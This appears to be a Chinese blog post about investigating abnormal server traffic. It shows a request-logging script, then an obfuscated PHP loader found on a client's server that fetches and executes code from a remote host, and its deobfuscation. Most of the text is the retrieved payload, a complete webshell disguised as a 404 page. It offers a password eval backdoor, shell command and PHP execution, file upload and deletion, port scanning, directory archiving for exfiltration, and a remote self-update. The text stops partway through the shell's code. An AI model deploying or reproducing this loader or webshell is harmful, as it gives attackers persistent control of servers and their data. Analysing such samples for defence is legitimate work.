晚上客户反映服务器最近流量有些异常,于是就去查看服务器日志。为了方便排查,写了一个脚本,把每次请求的时间、来源 IP、URL、User-Agent 和 Referer 记录下来:
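<?php
// Request logger used while investigating the abnormal traffic: appends one
// record per request (time, client IP, URL, User-Agent, Referer) to ua.txt.
//
// NOTE: ua.txt is opened with a relative path. If that resolves to a directory
// served by the web server, the log can be downloaded by anyone; keep it
// outside the document root or deny access to it in the server configuration.
$ua_file = "ua.txt";

// Host, URI, User-Agent and Referer are client-controlled. A missing header
// becomes an empty string instead of raising a notice, and control characters
// (CR/LF, terminal escapes) are replaced so that a crafted value cannot break
// the one-field-per-line record layout or affect a terminal displaying the log.
$ua_fields = array();
foreach (array('REMOTE_ADDR', 'HTTP_HOST', 'REQUEST_URI', 'HTTP_USER_AGENT', 'HTTP_REFERER') as $ua_key) {
    $ua_value = isset($_SERVER[$ua_key]) ? (string) $_SERVER[$ua_key] : '';
    $ua_fields[$ua_key] = preg_replace('/[\x00-\x1F\x7F]/', ' ', $ua_value);
}
unset($ua_key, $ua_value);

$ua_data = date("Y/m/d H:i:s") . "----" . $ua_fields['REMOTE_ADDR'] . "\n";
$ua_data .= "http://" . $ua_fields['HTTP_HOST'] . $ua_fields['REQUEST_URI'] . "\n";
$ua_data .= $ua_fields['HTTP_USER_AGENT'] . "\n";
$ua_data .= $ua_fields['HTTP_REFERER'] . "\n";
$ua_data .= "\n";

// LOCK_EX keeps records from concurrent requests from interleaving; a failed
// write is reported to the PHP error log instead of producing fwrite()/fclose()
// warnings on an invalid handle.
if (file_put_contents($ua_file, $ua_data, FILE_APPEND | LOCK_EX) === false) {
    error_log("request logger: cannot append to " . $ua_file);
}
?>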
可是其中一个被请求的文件引起了我的注意,直接打开看看~
<?php
// Sample as found on the server. Every sensitive function name is split into
// fragments and reassembled at run time, so none of them appears literally in
// the file (presumably to get past keyword-based scanners).

// The payload listed later on this page tests defined('iphp') and uses this
// value as its password constant.
define('iphp','oday');
// pack() format string: hex string, high nibble first.
define('T','H*');
// Fragments of the function names assembled below.
define('A','call');
define('B','user');
define('C','func');
define('D','create');
define('E','function');
define('F','file');
define('F1','get');
define('F2','contents');
define('P','pack');
$p = P; // "pack"
$call = sprintf('%s_%s_%s',A,B,C); // "call_user_func"
$create = sprintf('%s_%s',D,E); // "create_function"
$file = sprintf('%s_%s_%s',F,F1,F2); // "file_get_contents"
// One hex digit per element; joined and passed through pack('H*') this yields
// the URL the code is fetched from.
$t = array('6','8','7','4','7','4','7','0','3','a','2','f','2','f','6','4','6','f','6','4','6','f','6','4','6','f','6','d','6','5','2','e','7','3','6','9','6','e','6','1','6','1','7','0','7','0','2','e','6','3','6','f','6','d','2','f','6','7','6','5','7','4','6','3','6','f','6','4','6','5','2','e','7','0','6','8','7','0','3','f','6','3','6','1','6','c','6','c','3','d','6','3','6','f','6','4','6','5');
// Evaluated inside-out: join the digits, hex-decode them to a URL, fetch that
// URL, hex-decode the response, turn it into an anonymous function and call it.
// The file on disk therefore holds no payload of its own. For defenders: this
// chain needs URL-aware fopen wrappers (allow_url_fopen) and create_function(),
// which was removed in PHP 8.0; outbound HTTP from the PHP process on every
// request to this file is the observable side effect.
$call($create(null,$p(T,$file($p(T,join(null,$t))))));
?>
于是随手解混淆了一下,发现还原后的代码是这样子的
<?php
// Annotated copy of the sample above: the statements are the same, the comments
// name the function each assembled string resolves to.
define('iphp','oday');
define('T','H*');
define('A','call');
define('B','user');
define('C','func');
define('D','create');
define('E','function');
define('F','file');
define('F1','get');
define('F2','contents');
define('P','pack');
$p = P; // pack
// The function names are clearly being assembled by string concatenation
$call = sprintf('%s_%s_%s',A,B,C); // call_user_func: invokes a callable
$create = sprintf('%s_%s',D,E); // create_function: builds a function from a string of code
$file = sprintf('%s_%s_%s',F,F1,F2); // file_get_contents: used here to read a remote file
$t = array('6','8','7','4','7','4','7','0','3','a','2','f','2','f','6','4','6','f','6','4','6','f','6','4','6','f','6','d','6','5','2','e','7','3','6','9','6','e','6','1','6','1','7','0','7','0','2','e','6','3','6','f','6','d','2','f','6','7','6','5','7','4','6','3','6','f','6','4','6','5','2','e','7','0','6','8','7','0','3','f','6','3','6','1','6','c','6','c','3','d','6','3','6','f','6','4','6','5');
//$call($create(null,$p(T,$file($p(T,join(null,$t))))));
// join(null,$t): join() concatenates the array elements into one string
// NOTE(review): the line below is the author's shorthand for the commented-out
// call and is not valid PHP as written: H* is unquoted and the inner pack() is
// missing. Following the original call, the order is: join the digits,
// pack('H*') to obtain the URL, file_get_contents() on that URL, pack('H*') on
// the response, create_function() on the decoded text, then call_user_func().
call_user_func(create_function(null,pack(H*,file_get_contents(H*,join(null,$t)))));
?>
其中的join(null,$t)得到的是
687474703a2f2f646f646f646f6d652e73696e616170702e636f6d2f676574636f64652e7068703f63616c6c3d636f6465
然后$p(T,join(null,$t));得到的结果是
http://dododome.sinaapp.com/getcode.php?call=code
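那么一目了然了:从http://dododome.sinaapp.com/getcode.php?call=code读取到的内容,先经过pack('H*')做十六进制解码,然后通过create_function和call_user_func直接执行。也就是说,落在服务器上的这个文件本身不包含恶意代码主体,真正的代码是在每次请求时从远程拉取的。读取到的代码如下: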
//<?php // +---------------------------------------------------------------------- // | Copyright (c) 2006-2012 KingBin All rights reserved. // +---------------------------------------------------------------------- // | Licensed ( http://www.apache.org/licenses/LICENSE-2.0 ) // +---------------------------------------------------------------------- // | Author: KingBin ooooooo.oooo.ooooooo@foxmail.com // +---------------------------------------------------------------------- error_reporting(0); define('KING_SELF', basename($_SERVER["SCRIPT_FILENAME"])); define('IS_WIN', 'win' == substr(strtolower(PHP_OS), 0, 3)); defined('mamashuoanquangoushigehenrongyiguodedashaguaruanjian') or define('mamashuoanquangoushigehenrongyiguodedashaguaruanjian', 'demo'); date_default_timezone_set('asia/shanghai'); //新增过狗验证 if(defined('iphp')) define('_pass_',iphp); else define('_pass_',mamashuoanquangoushigehenrongyiguodedashaguaruanjian); //结束 if (!isset($_SESSION)) { session_start(); } function init() { remote_e(); header("Content-type:text/html;charset=utf-8"); session(); //update(); $do = new king; $do->start(); } function remote_e() { $pass = $_REQUEST['pass']; $e = $_REQUEST['e']; if ($pass == _pass_) { if ($e) eval($e); die; } } function _getcwd() { return $_SESSION['dirpath'] . '/'; } function kill($process) { $wmi = new COM("Winmgmts:/root/cimv2"); $data = $wmi->ExecQuery(sprintf("SELECT * FROM Win32_Process Where Name='%s'", $process)); foreach ($data as $v) { $v->Terminate(); } } function session() { $sessid = empty($_COOKIE[session_name()]) ? 
$_COOKIE[session_name()] : null; if ($sessid) session_id($sessid); } function update() { $code = "<?php session_start(); define('version','v2'); define('pp', '{pass}'); if(isset(\$_SESSION['k'])){ \$k = \$_SESSION['k']; }else{ \$_SESSION['k'] = pack('H*',file_get_contents(pack('H*','687474703a2f2f66696c652e6865696c6979752e636f6d2f676574636f64652e7068703f63616c6c3d636f6465'))); \$k = \$_SESSION['k']; } call_user_func(create_function(null,\$k)); ?> "; $pass = _pass_; $contents = str_replace('{pass}', $pass, $code); if (!defined('version') || version != 'v2') { file_put_contents(KING_SELF, $contents); //header('location:' . KING_SELF); } } function I($name) { return $_REQUEST[$name]; } //已经废弃 function _king($key) { $opts = array('http' => array('method' => 'GET', 'timeout' => 10)); $context = stream_context_create($opts); if (isset($_SESSION['code'])) { $code = bin::decode($_SESSION['code'], $key); } else { $_SESSION['code'] = $GLOBALS['p']('H*', $GLOBALS['f']($GLOBALS['s']('%s/%s', $GLOBALS['p'] ('H*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f'), $key)), false, $context); $code = $GLOBALS['s']('%s', @bin::decode($_SESSION['code'], $key)); } //这里很重要针对5.3 以上匿名优化 $GLOBALS['c']($GLOBALS['e'](false, $code)); } //end function css() { $code = <<< css <style> input{font:11px Verdana;height:18px;border:1px solid #666666;}a{color:#00f;text-decoration:underline;}a:hover{color:#f00;text-decoration:none;}#header{height:20px;border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 15px 5px 5px;font-weight:bold;}#header .left{float:left;}#header .right{float:right;}#menu{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 15px 5px 5px;}#content{margin:0 auto;width:98%;}#content h2{margin-top:15px;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}#content #base,#content #base2{background:#eee;margin-bottom:10px;}#base 
input{float:right;border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;margin:5px 10px;}.cdrom{padding:5px;margin:auto 7px;}.h{margin-top:8px;}#base2 .input{font:12px Arial,Tahoma;background:#fff;border:1px solid #666;padding:2px;height:18px;}#base2 .bt{border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}dl,dt,dd{margin:0;}.focus{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 15px 5px 5px;}.fff{background:#fff}dl{margin:0 auto;width:100%;}dt,dd{overflow:hidden;border-top:1px solid white;border-bottom:1px solid #DDD;background:#F1F1F1;padding:5px 15px 5px 5px;}dt{border-top:1px solid white;border-bottom:1px solid #DDD;background:#E9E9E9;font-weight:bold;padding:5px 15px 5px 5px;}dt span,dd span{width:19%;display:inline-block;text-indent:0em;overflow:hidden;}#footer{padding:10px 30px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;}#load{position:fixed;right:0;border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 15px 5px 5px;display:none;}.in{width:40px;text-align:center;}.high{background-color:#0449BE;color:white;margin:0 2px;padding:2px 3px;width:10px;}.high2{margin:0 2px;padding:2px 0px;width:10px;}#login{display:none;}#show_file{padding: 10px 10px;border: #000 solid;color:#000;height:400px;width:800px;position:fixed;top:45%;left:50%;margin-top:-200px;margin-left:-400px;background:#fff;overflow:auto;}#open,#upload{display:none;position:fixed;top:45%;left:50%;margin-top:-200px;margin-left:-400px;}#close{color:#fff;height:16px;width:30px;position:absolute;right:0;background:#000;z-index:1;}#upfile{width:628px;height:108px;padding:10px 20px;background-color:white;position:fixed;top:45%;left:50%;margin-top:-54px;margin-left:-314px;border:#000 solid;} #login{display:none;} body{font:14px Arial,Tahoma;line-height:16px;margin:0;padding:0;} h1{display: block;font-size: 32px;font-weight: 
bold;font-family:none;} .not_found{margin:20px 20px;} .not_found p{font-family:none;font: 14px Arial,Tahoma;line-height: 16px;} in{border:1px;} .red{color:#FF0085;} #base2 .input{width:260px;} .hide{display:none;} .showfile {font-size: 16px;line-height: 28px;} </style> css; return $code; } function js() { $code = <<< js <script> (function() { function _key() { $(document).keydown(function(e) { var key = (e.keyCode) || (e.which) || (e.charCode); if (key == 80) { $(".not_found").hide(); $("#login").show(); } }); } function error(msg, element, speed) { speed = speed || "3000"; //setTimeout('$(element).show("slow")',speed); $(element).show(); $(element).text(msg); setTimeout( function() { $(element).hide(); } , speed); } function post(element, url, form) { $(element).click(function() { $.get(url, $(form).serialize(), function(data) { if (data.status == 100) { error(data.msg, '#notice', 2000); }else{ $("body").html(data.html); //bind default event _init(); } }, "json"); }); } function close(){ $("#close").click(function(){ $("#open").hide(); }); $("#close_file").click(function(){ $("#upfile").hide(); }); } function get(element){ $(element).on('click',function(e){ $.get(this.href,function(data){ if(data == null){ error('权限不足,无法查看!', '#load', 2000); } if(data.showfile){ $("#open").show(); $('#show_file').empty(); $('#show_file').append(data.showfile); } if(data.editfile){ if($(window).scrollTop()>0) $('body,html').animate({scrollTop:0},1000); $(".newfile").show(); $(".newfile_name").empty(); $(".newfile_name").val(data.filename); $(".newfile_value").empty(); $(".newfile_value").text(data.editfile); } if(data.html) { $("body").html(data.html); //bind default event _init(); } if(data.msg){ error(data.msg, '#load', 2000); } if(data.status==200){ //window.location.href={gourl} window.location.reload(); } },"json"); e.preventDefault(); return false; }); return false; } function find(){ $('.qh').click(function(){ var find = $('.find').val(); if( find == null){ 
error('切换的路径不能为空', '#load', 2000); } $.get('?action=find&file='+find,function(data){ if(data == null){ error('切换的路径不能为空!', '#load', 2000); } if(data.html) { $("body").html(data.html); //bind default event _init(); } if(data.msg){ error(data.msg, '#load', 2000); } },"json"); }); } function port(){ $(".click_port").click(function(){ $('.port_hide').toggle(); $(".findport").click(function(){ error("正在扫描端口,请耐心等待", '#load', 2000); var port = $('.port').val(); $.get('?action=port&ports='+port,function(data){ if(data.showfile){ $("#open").show(); $('#show_file').empty(); $('#show_file').append(data.showfile); } if(data.msg){ error(data.msg, '#load', 2000); } },"json"); }); }); } function upload(){ $('.upload').click(function(){ $('#upfile').toggle(); }); $(".postfile").click(function(){ $('#upfile').hide(); $("#form1").submit(); }); } function runphp(){ $(".run_php").click(function(){ $('.runphp_hide').toggle(); $(".runphp_click").click(function(){ error("正在执行php代码,请耐心等待", '#load', 2000); var port = $('.runphp_value').val(); $.get('?action=runphp&codes='+port,function(data){ if(data.showfile){ $("#open").show(); $('#show_file').empty(); if(data.showfile==null){ error("语句执行错误,或者执行的函数被禁用!", '#load', 2000); } $('#show_file').append(data.showfile); } if(data.msg){ error(data.msg, '#load', 2000); } },"json"); }); }); } function run_command(){ $(".run_command").click(function(){ $('.runcommand_hide').toggle(); $(".runcommand_click").click(function(){ error("正在执行命令,请耐心等待", '#load', 2000); var port = $('.runcommand_value').val(); $.get('?action=runcommand&codes='+port,function(data){ if(data.showfile){ $("#open").show(); $('#show_file').empty(); if(data.showfile){ error("命令执行成功!", '#load', 2000); $('#show_file').append('<pre>'+data.showfile+'</pre>'); } } if(data.msg){ error(data.msg, '#load', 2000); } },"json"); }); }); } function newfile(){ $("._newfile").click(function(){ $(".newfile").toggle(); }); $(".newfile_click").click(function(){ var name = $(".newfile_name").val(); var 
contents = $(".newfile_value").val(); if(name==''){ error("新建文件不能为空!", '#load', 2000); return false; } if(contents==''){ error("新建内容不能为空!", '#load', 2000); return false; } if(name && contents){ $.post('?action=createfile',{file:name,body:contents},function(data){ if(data.html) { $("body").html(data.html); //bind default event _init(); } if(data.msg){ error(data.msg, '#load', 2000); } },"json"); } }); } function newfolder(){ $("._newfolder").click(function(){ $(".newfolder").toggle(); }); $(".newfolder_click").click(function(){ var name = $(".newfolder_name").val(); if(name==''){ error("新建文件夹不能为空!", '#load', 2000); return false; } if(name){ $.post('?action=newfolder',{file:name},function(data){ if(data.html) { $("body").html(data.html); //bind default event _init(); } if(data.msg){ error(data.msg, '#load', 2000); } },"json"); } }); } function pay(){ $('.pay').click(function(){ alert('付费模块正在努力制作中!'); }); } function _init() { $(function($) { _key(); url = $("#submit").attr('data_url'); post('#submit',url, '#f_login'); get('.action_del'); close(); find(); port(); runphp(); upload(); run_command(); newfile(); newfolder(); pay(); $('.packages').click(function(){ error('打包时间比较长,请耐心等待。。或者进行其他操作。。', '#load', 5000); }); }); } _init(); })(); </script> js; return $code; } function _html() { $code = <<< CODE <!DOCTYPE HTML> <head> <meta http-equiv="content-type" content="text/html" /> <meta http-equiv="content-type" charset="UTF-8" /> <title>404 Not Found</title> {load_css} <script src="http://lib.sinaapp.com/js/jquery/1.8/jquery.min.js"></script> {load_js} </head> <body> <div id="notice" style="position:fixed;right:0;border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 15px 5px 5px;display: none; font-size:12px;"></div> <div class="not_found"> <h1>Not Found</h1> <p>The requested URL /{url} was not found on this server.</p> </div> <div id="login"> <form action="" method="GET" id="f_login"> <span style="font:11px Verdana;"> Password: </span> 
<input id="pwd" name="password" type="password" size="20" /> <input id="submit" data_url="{url}" type="button" value=" login " /> </form> </div> </body> </html> CODE; return str_replace(array( '{url}', '{load_css}', '{load_js}'), array( KING_SELF, css(), js()), $code); } function class_html() { $code = <<< code <!DOCTYPE HTML> <head> <meta http-equiv="content-type" content="text/html" /> <meta http-equiv="content-type" charset="UTF-8" /> <title>404 Not Found</title> {load_css} <script src="http://lib.sinaapp.com/js/jquery/1.8/jquery.min.js"></script> {load_js} </head> <body> {body} </body> </html> code; return $code; } function class_body() { $code = <<< code <div id="load"> </div> <div class='hide' id="upfile"> <p></p><p></p><p><a href="javascript:;;;" id="close_file">点我关闭</a></p> <form action="?action=upload" id="form1" name="form1" encType="multipart/form-data" method="post" target="hidden_frame"> <input name="action" value="upload" type="hidden" /> <input type="file" id="userfile" name="userfile"> <INPUT class="postfile" type="button" value="上传文件"> <iframe name="hidden_frame" id="hidden_frame" style="display:none"></iframe> </form> </div> <div id="open"> <div style="position:relative;"> <div id="close">关闭</div> </div> <div id="show_file" class="showfile"> </div> </div> <div id="header"> <div class="left"> {host}({ip}) </div> <div class="right"> OS:{uname} {software} php {php_version} </div> </div> <div id="menu"> {menu} </div> <div id="content"> <h2>文件管理 - 当前磁盘空间 <span id="disktotal">{space_total}</span> 运行用户:{whoami}</h2> <div id="base"> <div class="cdrom"> <span id="listdir"> {current_dir}</span> </div> <div class="cdrom"> {all_dir} </div> </div> <div class="h"></div> <div id="base2"> <div class="cdrom"> {action} </div> <div class="cdrom"> 切换路径: <input class="input find" name="findstr" value="" type="text" /> <input class="bt qh" value="切换" type="submit" /> </div> <div class="cdrom runcommand_hide hide"> 运行命令: <input class="input runcommand_value" 
name="runphp" value="" type="text"/> <input class="bt runcommand_click" value="运行" type="submit" /> </div> <div class="cdrom port_hide hide"> 扫描端口: <input class="input port" name="findstr" value="21,22,25,80,3306,9000,11211" type="text" /> <input class="bt findport" value="扫描" type="submit" /> </div> <div class="cdrom runphp_hide hide"> 运行php: <textarea class="input runphp_value" name="runphp" value="" type="text" style="width:600px;height:200px;"/></textarea> <input class="bt runphp_click" value="运行" type="submit" /> </div> <!--new file --> <div class="cdrom hide newfile"> 新建文件: <input class="input newfile_name" style="font-size:16px;color:blue;" name="findstr" value="" type="text" /> <div style="margin-top:10px;"> 新建内容: <textarea class="input newfile_value" name="runphp" value="" type="text" style="width:600px;height:200px;font-size:16px;color:blue;line-height: 28px;"/></textarea> <input class="bt newfile_click" value="新建" type="submit" /> </div> </div> <!--end--> <div class="cdrom hide newfolder"> 新文件夹: <input class="input newfolder_name" name="findstr" value="" type="text" /> <input class="bt newfolder_click" value="新建" type="submit" /> </div> </div> <!-- return --> <div id="show"> <dl> <dt> <span class="in"> </span> <span>文件名</span> <span>修改时间</span> <span>文件大小</span> <span>权限</span> <span>操作</span> </dt> <dd > <span class="in"> - </span> <span> <a class='action_del' href="?action=up">返回上一目录</a> </span> <span></span> <span></span> <span></span> <span></span> </dd> <!-- file --> {showfile} <!-- file end --> </dl> </div> <!-- page start--> <!-- end --> </div> <div class="h"></div> <div id="footer"> 当前版本:2.0 一句话连接提供 {http}/{k}?pass={p} 密码是e</span> </div> code; return str_replace(array('{http}', '{k}', '{p}'), array($_SERVER["HTTP_HOST"], KING_SELF, _pass_), $code); } function show_html() { $code = <<< code <dd class="{color}" onmouseover="this.className='focus'" onmouseout="this.className='{color}'"> <span class="in"> <input name="" type="checkbox"> </span> 
<span> <a class="action_del {.red}" href="{self}?action=view&file={file}" name="" >{return_file}</a> </span> <span> <a href="javascript:;;;" name="" >{return_time}</a> </span> <span>{return_size}</span> <span> <a href="javascript:;;;" name="" >{return_chmod}</a> / <a href="javascript:;;;" name="">{return_perms}</a> </span> <span> {is_folder} </span> </dd> code; return $code; } function pages() { $code = <<< code <div id="pages"> <dl> <dd> <span class="in"> </span> <span></span> <span></span> <span></span> <span style="text-align:right;width:38%"> <a class="high2" href="javascript:;;;" name="action=show&dir=$_ipage_file&page=1" >Index</a> <a class="high2" href="javascript:;;;" name="action=show&dir=$_ipage_file&page=$previous" >Previous</a> {pages} <a class="high2" href="javascript:;;;" name="action=show&dir=$_ipage_file&page=$next" >Next</a> <a class="high2" href="javascript:;;;" name="action=show&dir=$_ipage_file&page=$nums" >End</a> </dd> </dl> </div> code; } function _login() { $password = I('password'); //去掉原有key保护改为用户自定义密码[服务端已修改] //&& NULL == bin::decode($GLOBALS['p']('H*', $GLOBALS['f']($GLOBALS['s']('%s/%s', $GLOBALS['p']('H*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f'), $key))), $key) if (isset($password) && $password !=_pass_) { die('{"status":"100","msg":"密码不对"}'); } echo _html(); } function _logout() { setcookie(session_name(),null, time() - 86400); session_destroy(); } function is_ajax() { if (strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) == 'xmlhttprequest') return true; } function run() { $action = new run(); $action->index(); } function _is_login() { $cookie = !empty($_SESSION['_king_key']) ? pack('H*', $_SESSION['_king_key']) : null; $key = I('password') ? 
I('password') : $cookie; if (_pass_ == $key) { if ($_SESSION['_king_key'] != bin2hex(_pass_)) { //setcookie('_king_key', bin2hex($key), time() + 86400); setcookie(session_name(), session_id(), time() + 86400); $_SESSION['_king_key'] = bin2hex($key); } run(); } else _login(); } class run { function index() { $action = I('action') ? I('action') : null; if (isset($action)) { if (method_exists($this, $action)) $this->$action(); } else { $this->dump(); } } function restart() { if (!IS_WIN) { die('{"msg":"非常抱歉,此操作仅限windows系统"}'); } if (!class_exists('COM')) { die('{"msg":"非常抱歉,此机器不支持重启"}'); } //尝试重启 kill('services.exe'); die('{"msg":"正在尝试重启服务器系统,如不是system权限请放弃操作!"}'); } function find() { $dir = $this->gbk_mbstring(I('file')); if (is_dir($dir)) { $this->setpath($dir); $this->dump(); } } function hello() { $i = I('world'); if ($i) { eval($i); } exit; } function createfile() { $filename = I('file'); $contents = I('body'); if (isset($filename) && isset($contents)) { if (true == file_put_contents(_getcwd() . $filename, $contents)) { $this->dump('新建文件成功!'); } else { $this->dump('新建文件失败!'); } } } function newfolder() { $filename = I('file'); if (isset($filename)) { if (is_dir(_getcwd() . $filename)) { die('{"msg":"文件夹已经存在"}'); } if (true == mkdir(_getcwd() . $filename, 0777)) { $this->dump('新建文件夹成功!'); } else { $this->dump('新建文件夹失败!'); } } } function editfile(){ if(IS_WIN) $filename = I('file') ? $this->gbk_mbstring(pack("H*", I('file'))) : null; else $filename = I('file') ? $this->mbstring(pack("H*", I('file'))) : null; if (is_file($filename)) { ob_start(); echo file_get_contents($filename); $contents = ob_get_clean(); echo sprintf('{"editfile":%s,"filename":"%s"}', json_encode($this->mbstring($contents)),basename($filename)); } } function rmdir() { if(IS_WIN) $dir = I('file') ? $this->gbk_mbstring(pack("H*", I('file'))) : null; else $dir = I('file') ? 
$this->mbstring(pack("H*", I('file'))) : null; $files = array_diff(scandir($dir), array('.', '..')); foreach ($files as $file) { (is_dir("$dir/$file")) ? $this->rmdir("$dir/$file") : unlink("$dir/$file"); } if(true==rmdir($dir)){ $this->dump('文件夹删除成功!'); }else{ die('{"msg":"文件夹删除失败!"}'); } } function phpinfo() { $html = <<< code <pre> php参数查看 ====================================== 禁用的函数: {disable_function} 禁用的类 :{class} 支持的拓展 : {ext} 加载的项目 : {include} 前置调用 : {pre} 后置调用 :{next} 内存设置大小 : {mem} php.ini 路径 : {php} 最大上传 : {u} ======================================= code by blackbin </pre> code; $dis = ini_get('disable_functions'); $ext = join(',', get_loaded_extensions()); $in = ini_get('include_path'); $mem = ini_get('memory_limit'); $class = ini_get('disable_classes'); $php = php_ini_loaded_file(); $u = ini_get('upload_max_filesize'); $pre = ini_get('auto_prepend_file'); $next = ini_get('auto_append_file'); $code = str_replace(array( '{disable_function}', '{ext}', '{include}', '{mem}', '{class}', '{php}', '{u}', '{pre}', '{next}'), array( str_replace(',', '<br/> ', $dis), str_replace(',', '<br/> ', $ext), $in, $mem, $class, $php, $u, $pre, $next), $html); die(sprintf('{"showfile":%s}', json_encode($code))); } function port() { $port = explode(',', I('ports')); foreach ($port as $v) { if (true == $this->fsockopen($v)) { $yes[] = $v; } else { $no[] = $v; } } $html = <<< code <pre> 端口检测 ======================= 服务器开放端口:{yes} 服务器关闭端口:{no} ======================= </pre> code; $code = str_replace(array('{yes}', '{no}'), array(join(',', $yes), join(',', $no)), $html); die(sprintf('{"showfile":%s}', json_encode($code))); } function fsockopen($port) { $fp = fsockopen("127.0.0.1", $port, $errno, $errstr, 1); if (!$fp) { return false; } return true; } function runphp() { $codes = I('codes'); ob_start(); eval($codes); $c = ob_get_clean(); die(sprintf('{"showfile":%s}', json_encode($c))); } function runcommand() { $codes = I('codes'); ob_start(); echo `$codes`; $c = ob_get_clean(); 
die(sprintf('{"showfile":%s}', json_encode($this->mbstring($c)))); } function viewinfo() { phpinfo(); exit; } function logout() { _logout(); header('location:http://'.$_SERVER["HTTP_HOST"].'/'.KING_SELF); die('{"status":"200","msg":"你已成功退出!"}'); } function del() { if (IS_WIN) $file = I('file') ? $this->gbk_mbstring(pack("H*", I('file'))) : null; else $file = I('file') ? $this->mbstring(pack("H*", I('file'))) : null; if (isset($file)) { if (false == unlink($file)) { die('{"msg":"对不起,您没有删除此文件的权限!"}'); } else { $this->dump('成功删除文件!'); } } return; } function down() { if (IS_WIN) $filename = I('file') ? $this->gbk_mbstring(pack("H*", I('file'))) : null; else $filename = I('file') ? $this->mbstring(pack("H*", I('file'))) : null; if (isset($filename)) { if (file_exists($filename)) { $this->download($filename); } } return; } function linuxpkg() { if (IS_WIN) die('{"msg":"此功能仅限linux平台使用"}'); $disable_functions = ini_get('disable_functions'); if (strpos($disable_functions, 'shell_exec')) { die('{"msg":"非常抱歉,命令行已被禁用,请使用左边的打包功能!"}'); } $apath = pack('H*', $this->scriptroot()); $path = $_SESSION['dirpath']; $shell = sprintf('tar zcf %s.tar.gz %s', md5(uniqid()), $path); shell_exec($shell); $this->setpath($apath); $this->dump('亲,恭喜您,打包成功!'); } function packages() { if (!class_exists('ZipArchive')) { die('{"msg":"当前环境不支持打包!"}'); } $c = $this->_scandir($this->mbstring($_SESSION['dirpath'])); array_walk_recursive($c, array($this, 'tofile')); $res = $this->addzip(); if ($res) { //返回打包路径 $apath = pack('H*', $this->scriptroot()); $this->setpath($apath); $this->dump('亲,恭喜您,打包成功!'); } } function up() { $path = !empty($_SESSION['dirpath']) ? $_SESSION['dirpath'] : $this->basedir(); $_SESSION['dirpath'] = str_replace('\\', '/', $this->setpath(dirname($path))); $this->dump(); } //区分windows编码 windows gbk function view() { if (IS_WIN) $filename = I('file') ? $this->gbk_mbstring(pack("H*", I('file'))) : null; else $filename = I('file') ? 
$this->mbstring(pack("H*", I('file'))) : null; if (is_dir($filename)) { $this->setpath($filename); $this->dump(); } if (is_file($filename)) { ob_start(); show_source($filename); $contents = ob_get_clean(); echo sprintf('{"showfile":%s}', json_encode($this->mbstring($contents))); } } function upload() { $path = !empty($_SESSION['dirpath']) ? $_SESSION['dirpath'] : $this->basedir(); if (true == @file_put_contents($path . '/' . basename($_FILES['userfile']['name']), file_get_contents($_FILES['userfile']['tmp_name']))) { exit(' <script> parent.$("#load").show(); parent.$("#load").text("上传成功,刷新当前页面即可!"); setTimeout( function() { parent.$("#load").hide(); } , 2000); </script>'); } else { exit('<script> parent.$("#load").show(); parent.$("#load").text("上传失败!"); setTimeout( function() { parent.$("#load").hide(); } , 2000); </script>'); } } protected function dump($msg = null) { if (is_ajax()) { $this->dump_ajax($msg); } else { $this->dump_html(); } } //start function _scandir($path) { $path = $this->gbk_mbstring($path); $class = new DirectoryIterator($path); foreach ($class as $key => $fileinfo) { if ($fileinfo->getFilename() == '.' || $fileinfo->getFilename() == '..') continue; if ($fileinfo->isFile()) { $files[] = $this->mbstring($path) . '/' . $this->mbstring($fileinfo-> getFilename()); } if ($fileinfo->isDir()) { $dirs[] = $this->_scandir($path . '/' . $fileinfo->getFilename()); } } if (!isset($files)) $files = array(); if (!isset($dirs)) $dirs = array(); $return = array_merge($dirs, $files); return $return; } function trimpath($path) { return str_replace('\\', '/', $path); } function tofile($item, $key) { $GLOBALS['addzips'][] = array('pathname' => $item, 'filename' => ltrim(str_replace ($this->trimpath(dirname(__file__)), null, $item), '/')); } function addzip() { set_time_limit(0); $basename = md5(uniqid()) . 
'.zip'; $zip = new ZipArchive; if (!is_file($basename)) $res = $zip->open($basename, ZipArchive::CREATE); else $res = $zip->open($basename); if ($res === true) { foreach ($GLOBALS['addzips'] as $add) { if (basename($add['pathname']) == $basename) continue; $zip->addFile($this->gbk_mbstring($add['pathname']), $this->gbk_mbstring($add['filename'])); } $zip->close(); } else { die('{"msg":"不能创建打包程序,可能是目录没有读写权限!"}'); } return true; } //end function download($filename) { set_time_limit(0); $file = new SplFileObject($filename); header("Cache-Control: no-cache, must-revalidate"); header("Pragma: no-cache"); header("Content-Disposition: attachment; filename=" . $file->getbasename()); header("Content-Length: " . $file->getsize()); header("Content-Type: application/force-download"); header('Content-Description: File Transfer'); header('Content-Encoding: none'); header("Content-Transfer-Encoding: binary"); while (!$file->eof()) { echo $file->fgets(); } } protected function dump_ajax($msg = null) { if ($msg) { echo sprintf("{\"html\":%s,\"msg\":\"%s\"}", $this->ajax(), $msg); } else { echo sprintf("{\"html\":%s}", $this->ajax()); } } protected function dump_html() { $html = $this->html(); $menu = join(" | ", $this->menu()); $action = join(" | ", $this->action()); echo str_replace(array("{menu}", "{action}"), array($menu, $action), $html); } protected function is_utf8($str) { $c = 0; $b = 0; $bits = 0; $len = strlen($str); for ($i = 0; $i < $len; $i++) { $c = ord($str[$i]); if ($c > 128) { if (($c >= 254)) return false; elseif ($c >= 252) $bits = 6; elseif ($c >= 248) $bits = 5; elseif ($c >= 240) $bits = 4; elseif ($c >= 224) $bits = 3; elseif ($c >= 192) $bits = 2; else return false; if (($i + $bits) > $len) return false; while ($bits > 1) { $i++; $b = ord($str[$i]); if ($b < 128 || $b > 191) return false; $bits--; } } } return true; } protected function byte_format($size, $dec = 2) { $a = array( "B", "KB", "MB", "GB", "TB", "PB"); $pos = 0; while ($size >= 1024) { $size /= 
1024; $pos++; } return round($size, $dec) . "" . $a[$pos]; }
